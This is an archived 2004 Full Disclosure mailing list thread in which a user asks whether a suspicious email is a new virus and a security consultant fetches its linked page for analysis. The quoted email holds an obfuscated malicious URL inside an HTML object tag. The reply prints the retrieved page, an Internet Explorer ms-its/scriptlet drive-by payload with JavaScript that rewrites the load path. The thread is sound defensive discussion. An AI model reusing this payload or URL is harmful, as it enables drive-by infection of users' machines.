Full Disclosure mailing list archives
Re: new email virus?
From: Tremaine <tremaine () gmail com>
Date: Wed, 25 Aug 2004 14:28:54 -0600
On Wed, 25 Aug 2004 14:37:18 -0400, John Nagro <john.nagro () gmail com> wrote:
my co-worker got this in their email today... here is the body + some headers + the attachment... could this be a new virus? anyone else see anything like this? MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="--------fthllkqoljuvkhyckltf" X-YAVR: XML-CODEBASE Subject: WARNING-XML-CODEBASE-OBJECT-2 ----------fthllkqoljuvkhyckltf Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: 7bit <html><body> <object data="http://www.v%69k%6F%72d.com/default.htm"><br><br> <br> </body></html> ----------fthllkqoljuvkhyckltf Content-Type: application/octet-stream; name="1.gif" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="1.gif" NDU0NTEyMTI= ----------fthllkqoljuvkhyckltf-- ------------------------------------------------------------------------ -- John Nagro john.nagro () gmail com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Quick snag with wget: wget http://www.v%69k%6F%72d.com/default.htm --14:26:50-- http://www.vikord.com/default.htm => `default.htm' Resolving www.vikord.com... 194.226.217.167 Connecting to www.vikord.com[194.226.217.167]:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 350 --.--K/s 14:26:56 (3.34 MB/s) - `default.htm' saved [350] username@coroner ~ $ cat default.htm <textarea id="code" style="display:none;"> <object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object> </textarea> <script language="javascript"> document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm')))); </script> Feel free to keep digging -- Tremaine IT Security Consultant _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- new email virus? John Nagro (Aug 25)
- Re: new email virus? Tremaine (Aug 25)
- Re: new email virus? morning_wood (Aug 25)
- Re: new email virus? Charles Heselton (Aug 25)
- Re: new email virus? Nick FitzGerald (Aug 29)
- Re: new email virus? Charles Heselton (Aug 25)
- <Possible follow-ups>
- RE: new email virus? Todd Towles (Aug 25)